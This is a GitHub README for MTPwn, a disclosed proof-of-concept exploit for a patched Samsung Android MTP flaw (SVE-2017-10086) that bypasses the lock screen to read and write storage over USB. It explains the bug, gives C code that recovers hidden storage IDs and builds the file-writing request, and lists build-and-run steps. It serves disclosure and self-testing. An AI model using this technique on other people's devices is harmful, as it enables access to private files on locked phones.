
smeso / Mtpwn

Licence: gpl-3.0
PoC exploit for arbitrary file read/write in locked Samsung Android device via MTP (SVE-2017-10086)

Programming Languages

c

MTPwn
=====

  • Author: Salvatore Mesoraca (https://smeso.it)
  • IDs: SVE-2017-10086
  • Severity: High
  • Affected versions: KK(4.4.x), L(5.x), M(6.x), N(7.x)
  • Date of discovery: 25/08/2017
  • Date of upstream report: 28/08/2017
  • Date of fix: 27/10/2017
  • Date of public disclosure: 02/01/2018

What's MTPwn?
-------------

MTPwn is a PoC exploit for a vulnerability in Samsung's Android phones that allows an attacker with USB access to read and write the phone's storage, bypassing the lock screen and/or the Charge only USB mode. The program lists the paths and names of the files on the device (both internal memory and external SD card), downloads one randomly chosen file into the current directory, and creates a file named PWND in the root of one of the device's storages. Its purpose is to demonstrate the vulnerability and to let people test their own devices for it; it does not aim to be a ready-to-use exploit for people willing to do harm. Nevertheless, MTPwn can easily be modified to download or delete any file, to create and delete folders, and to do many other things.

Currently known affected devices
--------------------------------

Any Samsung Android device that lacks the SMR-OCT-2017 or SMR-NOV-2017 update. The exact update that fixes this issue depends on the device model.

How it works
------------

One of the most common ways to connect an Android phone to a computer is the Media Transfer Protocol (MTP). Via MTP you can manage folders, files (and some other things) on the different storages (i.e. internal memory and SD card) available on the device. When the phone's screen is locked with a password, or when the USB mode is set to Charge only, it should not be possible to access the device via MTP (or any other USB protocol).

Unfortunately, what really happens is that the device only prevents you from obtaining the list of the available storages; it lets you do everything else. Most common MTP clients will probably refuse to work with a device that reports zero storages, but a client can simply ask for the list of all objects on all storages, and the device will satisfy the request. The interesting part is that the object information returned for each file includes the id of the storage it lives on, so those storage ids can then be used in requests that cannot be issued generically against all storages, e.g. file uploads.

According to my experiments this vulnerability is present on a great variety of Samsung devices from 2012 until 2017, with any Android version from 4.0.3 to 7.x.
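The client-side trick described above, expressed at the PTP/MTP wire level, as an added example: this is not MTPwn's own code (MTPwn is built on libmtp) nor code from the project's author. It encodes the command containers a client sends, decodes the data-phase payloads a device returns, and recovers the StorageID from an ObjectInfo dataset so that it can be fed into SendObjectInfo together with the root-parent wildcard. The operation codes, wildcard values and dataset layout are those of the PTP/MTP specification; the device replies are constructed inline and not captured from a phone, and the storage id 0x00010001 and the folder name DCIM are placeholders. Driving a real device additionally needs the USB transport (bulk endpoints, plus the container header in front of each data-phase payload), which is what libmtp provides.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* PTP/MTP bulk container: Length(u32) Type(u16) Code(u16) TransactionID(u32) Params(0-5 x u32) */
#define PTP_CONTAINER_COMMAND   0x0001
#define PTP_OC_GetObjectHandles 0x1007
#define PTP_OC_SendObjectInfo   0x100C
#define PTP_OFC_Undefined       0x3000  /* object format: generic file */
#define PTP_OFC_Association     0x3001  /* object format: folder */
#define PTP_ALL_STORAGE 0xFFFFFFFFu     /* GetObjectHandles wildcards: every storage, format, parent */
#define PTP_ALL_FORMATS 0x00000000u
#define PTP_ALL_ASSOCS  0x00000000u
#define PTP_ROOT_PARENT 0xFFFFFFFFu     /* SendObjectInfo: place the object in the storage root */
struct ptp_objectinfo { uint32_t storage_id; uint16_t format; uint32_t parent; char filename[64]; };
static void put_u16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put_u32(uint8_t *p, uint32_t v) { put_u16(p, (uint16_t)v); put_u16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get_u16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get_u32(const uint8_t *p) { return (uint32_t)get_u16(p) | ((uint32_t)get_u16(p + 2) << 16); }

/* PTP string: u8 char count including the NUL terminator, then UTF-16LE. */
static size_t put_ptp_string(uint8_t *p, const char *s) {
    size_t n = strlen(s);
    p[0] = (uint8_t)(n + 1);
    for (size_t i = 0; i <= n; i++) put_u16(p + 1 + 2 * i, i < n ? (uint8_t)s[i] : 0);
    return 1 + 2 * (n + 1);
}

/* Encode a command container; returns bytes written, 0 if nparams > 5 or the buffer is too small. */
size_t ptp_build_command(uint8_t *out, size_t outsz, uint16_t code, uint32_t tid,
                         const uint32_t *params, size_t nparams) {
    size_t len = 12 + 4 * nparams;
    if (nparams > 5 || outsz < len) return 0;
    put_u32(out, (uint32_t)len); put_u16(out + 4, PTP_CONTAINER_COMMAND);
    put_u16(out + 6, code);      put_u32(out + 8, tid);
    for (size_t i = 0; i < nparams; i++) put_u32(out + 12 + 4 * i, params[i]);
    return len;
}

/* Decode a u32 array payload (GetStorageIDs / GetObjectHandles); -1 if the device's count does not fit. */
int ptp_parse_u32_array(const uint8_t *data, size_t len, uint32_t *out, size_t max) {
    if (len < 4) return -1;
    uint32_t n = get_u32(data);
    if (n > (len - 4) / 4 || n > max) return -1;   /* never trust a device-supplied count */
    for (uint32_t i = 0; i < n; i++) out[i] = get_u32(data + 4 + 4 * i);
    return (int)n;
}

/* Encode an ObjectInfo dataset: 52 fixed bytes (StorageID @0, Format @4, Size @8, ParentObject @38),
   then Filename; DateCreated, DateModified and Keywords are sent as empty strings (one 0 byte each). */
size_t ptp_build_objectinfo(uint8_t *out, size_t outsz, uint32_t storage_id, uint16_t format,
                            uint32_t parent, uint32_t size, const char *filename) {
    size_t n = strlen(filename);
    if (n == 0 || n > 254 || outsz < 52 + 1 + 2 * (n + 1) + 3) return 0;
    memset(out, 0, 52);
    put_u32(out, storage_id); put_u16(out + 4, format); put_u32(out + 8, size); put_u32(out + 38, parent);
    size_t off = 52 + put_ptp_string(out + 52, filename);
    memset(out + off, 0, 3); return off + 3;
}

/* Decode the ObjectInfo fields the attack needs; -1 if truncated. Non-ASCII filename chars become '?'. */
int ptp_parse_objectinfo(const uint8_t *data, size_t len, struct ptp_objectinfo *oi) {
    if (len < 53 || len < 53 + 2u * data[52]) return -1;
    oi->storage_id = get_u32(data); oi->format = get_u16(data + 4); oi->parent = get_u32(data + 38);
    size_t j = 0;
    for (size_t i = 0; i < data[52] && j + 1 < sizeof oi->filename; i++) {
        uint16_t c = get_u16(data + 53 + 2 * i);
        if (c == 0) break;
        oi->filename[j++] = c < 0x80 ? (char)c : '?';
    }
    oi->filename[j] = '\0'; return 0;
}

/* The bug pattern: GetStorageIDs lists no storages, yet GetObjectHandles(all storages) returns handles
   whose ObjectInfo carries a StorageID. Returns that id, or 0 when the pattern is absent. */
uint32_t recover_storage_id(const uint8_t *sids, size_t sids_len, const uint8_t *handles, size_t h_len,
                            const uint8_t *objinfo, size_t oi_len, struct ptp_objectinfo *oi) {
    uint32_t tmp[16];
    if (ptp_parse_u32_array(sids, sids_len, tmp, 16) != 0) return 0;   /* storages visible, or junk */
    if (ptp_parse_u32_array(handles, h_len, tmp, 16) <= 0) return 0;   /* nothing leaked */
    return ptp_parse_objectinfo(objinfo, oi_len, oi) == 0 ? oi->storage_id : 0;
}

int main(void) {
    /* Constructed device replies (data-phase payloads), not captured from a real phone. */
    const uint8_t no_storages[] = { 0, 0, 0, 0 }, one_handle[] = { 1, 0, 0, 0, 1, 0, 0, 0 };
    uint8_t oi_buf[128], cmd[32]; struct ptp_objectinfo oi;
    uint32_t goh[3] = { PTP_ALL_STORAGE, PTP_ALL_FORMATS, PTP_ALL_ASSOCS };   /* "every object, anywhere" */
    printf("GetObjectHandles wildcard request: %zu bytes\n",
           ptp_build_command(cmd, sizeof cmd, PTP_OC_GetObjectHandles, 2, goh, 3));
    size_t oi_len = ptp_build_objectinfo(oi_buf, sizeof oi_buf, 0x00010001u, PTP_OFC_Association,
                                         PTP_ROOT_PARENT, 0, "DCIM");  /* placeholder id and name */
    uint32_t sid = recover_storage_id(no_storages, 4, one_handle, 8, oi_buf, oi_len, &oi);
    if (!sid) { puts("no bypass pattern: storages listed normally or nothing leaked"); return 0; }
    printf("zero storages reported, but '%s' lives on storage 0x%08x\n", oi.filename, (unsigned)sid);
    /* Write path: SendObjectInfo(storage_id, parent) followed by an ObjectInfo dataset named PWND. */
    uint32_t soi[2] = { sid, PTP_ROOT_PARENT };
    printf("SendObjectInfo: %zu-byte command, %zu-byte ObjectInfo dataset\n",
           ptp_build_command(cmd, sizeof cmd, PTP_OC_SendObjectInfo, 4, soi, 2),
           ptp_build_objectinfo(oi_buf, sizeof oi_buf, sid, PTP_OFC_Undefined, PTP_ROOT_PARENT, 0, "PWND"));
    return 0;
}
```

Compile with `cc -std=c11 -Wall ptp_probe.c` (the file name is arbitrary). The decision in `recover_storage_id` is the one the description above implies: an empty storage list combined with a non-empty handle list and a parseable ObjectInfo is exactly the inconsistency a locked-but-vulnerable device exhibits. The bounds checks on the device-supplied counts are there because a client library parsing device data has the mirror-image exposure of the device parsing host data.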

How to test your device
-----------------------

First of all install libmtp:

  • Debian/Ubuntu::

    sudo apt-get install libmtp-dev

Download the latest MTPwn sources::

curl -L "https://github.com/smeso/MTPwn/archive/v0.1.tar.gz" -o mtpwn.tgz

Optionally, verify the detached signature on the sources; it should be made by the OpenPGP key with fingerprint 0xD7286260BBF31719A2759FA485F0580B9DACBE6E (gpg only reports a good signature if you have imported that key, so check that the fingerprint it prints matches)::

curl -L \
"https://github.com/smeso/MTPwn/releases/download/v0.1/v0.1.tar.gz.asc" \
-o mtpwn.tgz.asc
gpg -v --verify mtpwn.tgz.asc

Extract and compile the sources::

tar xzvf mtpwn.tgz
cd MTPwn-0.1
make

Connect your device with the screen locked by a password (or with the USB mode set to Charge only) and run MTPwn::

./mtpwn

On some devices it can take a long time; just wait until it returns. Make sure that no other application is trying to use MTP at the same time (for example a desktop file manager that automatically mounts MTP devices). If it fails, disconnect and reconnect the device and run MTPwn again a couple of times. If it works, it prints the list of all files available via MTP, the file downloaded from the device is in your current directory, and a file named PWND has been created in the root of one of your device's storages.

License
-------

This code is released under GPL-3.
